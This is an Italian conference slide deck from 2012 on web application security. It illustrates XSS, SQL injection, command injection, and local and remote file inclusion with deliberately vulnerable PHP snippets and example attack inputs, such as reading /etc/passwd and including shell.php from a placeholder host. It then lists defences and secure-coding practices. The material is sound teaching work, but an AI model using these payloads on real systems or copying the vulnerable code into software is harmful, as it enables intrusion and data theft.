View
921
Download
2
Category
Preview:
Citation preview
Alessio L.R. Pennasilicomayhem@alba.st
Roma, Ottobre 2012
Odio le mie webapp. Ma soprattutto chi le ha scritte!
Alessio L.R. Pennasilico
Alessio L.R. Pennasilico
Committed: AIP Associazione Informatici Professionisti, CLUSIT
AIPSI Associazione Italiana Professionisti Sicurezza Informatica
Italian Linux Society, Sikurezza.org, AIP/OPSI
Hacker’s Profiling Project, CrISTAL
2
!
Security Evangelist @
Alessio L.R. Pennasilico
Web è bello!
Lavoro ovunque, comunque, a qualsiasi ora, con qualsiasi device, accedendo a tutte le informazioni
che mi servono.
4
Alessio L.R. Pennasilico
Dove stava scritto sicurezza? :(
5
Alessio L.R. Pennasilico
XSS
Affligge siti web con scarso controllo di variabili derivate da input dell'utente. Permette di inserire codice a livello browser al fine di modificare il codice sorgente della pagina web visitata. In questo modo un cracker può tentare di recuperare dati sensibili quali cookies.
7
Alessio L.R. Pennasilico
SQL Injection
Sfrutta la non normalizzazione dell’input
a‘ OR ‘1’=’1
8
Alessio L.R. Pennasilico
Funzioni
exec() - system() - eval()
<?phpsystem("echo ".$_REQUEST['parametro']);?>
Se la usassi così?http://host/index.php?parametro=;touch /tmp/hacked
9
Alessio L.R. Pennasilico
Local File Inclusion
<?phpinclude('/var/www/articoli/' . $_REQUEST['articolo']);?>
L'utilizzo normale sarebbe:http://host/index.php?articolo=sport.html
ma posso usarlo così:http://host/index.php?articolo=../../../etc/passwd
10
Alessio L.R. Pennasilico
Remote File Inclusion
<?php include($_GET['page']);?>
Se la usassi così?http://host/index.php?page=http://xxx/shell.php
11
Alessio L.R. Pennasilico
Esempi reali
IIS Webservice
user e pass hardcoded
12
Alessio L.R. Pennasilico
Esempi reali
e-commerce
javascript
dati letti dal server ed inviati dal client
prezzi inclusi
13
Alessio L.R. Pennasilico
Esempi reali
Quanto sono comodi i tab?
14
Alessio L.R. Pennasilico
Filtrare a monte
UTM Firewall
IDS / IPS
DLP
16
Alessio L.R. Pennasilico
Software layer
Reverse Proxy
mod_*
17
Alessio L.R. Pennasilico
Configurare bene il sistema
chroot
privilege drop
permessi
mod_*
18
Alessio L.R. Pennasilico
Scrivere bene le app
input validation
controlli server side
19
Alessio L.R. Pennasilico
Standard e check
OWASP - Code review
OSSTMM - PenTest
Repetita iuvant
20
Alessio L.R. Pennasilico
Mitigare...
Eliminare le classiche cause di vulnerabilità
es: le password!
21
Alessio L.R. Pennasilico
Spiegare
Molti attacchi si possono evitare
con la user awarness
22
Alessio L.R. Pennasilico
Conclusioni
Senza scrivere buon codice
tutto il resto è un palliativo!
24
Alessio L.R. Pennasilico
Conclusioni
Preoccupatevi delle persone,
più della tecnologia!
25
Alessio L.R. Pennasilicomayhem@alba.st
Roma, Ottobre 2012
Grazie dell’attenzione! T h e s e s l i d e s a r e
written by Alessio L.R. P e n n a s i l i c o a k a mayhem. They are subjected to Creative Commons Attribution-S h a r e A l i k e - 2 . 5 version; you can copy, modify, or sell them. “Please” ci te your source and use the same licence :)
Recommended